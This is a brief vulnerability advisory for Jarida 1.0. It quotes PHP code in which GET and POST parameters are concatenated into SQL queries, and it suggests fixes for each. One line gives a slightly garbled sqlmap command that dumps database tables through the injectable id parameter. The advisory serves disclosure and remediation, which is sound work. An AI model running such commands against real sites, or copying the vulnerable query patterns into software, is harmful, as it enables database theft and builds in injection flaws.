Title: Jarida 1.0 SQL Injection
Author: Ptrace Security (Gianni Gnesa [gnix]) www.2cto.com
Project page: http://sourceforge.net/projects/jarida/
Affected Versions: 1.0
Test Platform: CentOS 5.6
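[01] ./article.php:28: $query = "SELECT article_id FROM tblArticle WHERE article_id = " . $_GET['id'];
=>./Sqlmap. py-u http://www.bkjia.com/jarida_1.0/article. php? Id = 1 -- dump -- tables
The id parameter is appended to the query unquoted and unvalidated. Casting it to an integer before use, or binding it through a prepared statement, removes the injection point.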
[02] ./comment.php
36 $name = $_POST['name'];
37 $web = $_POST['web'];
38 $title = $_POST['title'];
39 $body = $_POST['body'];
40 $ip = $_SERVER['REMOTE_ADDR'];
41 $article_id = $_POST['id'];
42 $date = time();
43
...
56
57 switch ($_POST['type'])
58 {
59 case 'article':
60 $redirect_url = "./article.php?id=" . $_POST['id'];
61 $query = "insert into tblArticleComment (comment_article_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
62 VALUES ('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";
63 break;
64
65 case 'photo':
66 $redirect_url = "./photo.php?id=" . $_POST['id'];
67 $query = "insert into tblPhotoComment (comment_photo_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip)
68 VALUES ('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')";
69 break;
70 }
In the lines shown, the $_POST values (name, web, title, body, id) are interpolated into both INSERT statements without escaping. Lines 43-56 are elided here, so confirm that they add no sanitising. Binding these values as prepared-statement parameters fixes both branches of the switch.
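[03] ./photo.php
39 $query = "SELECT photo_id FROM tblPhoto
40 WHERE photo_id = " . $_GET['id'];
As in [01], $_GET['id'] is concatenated into the WHERE clause as a bare value; the same integer cast or bound parameter applies here.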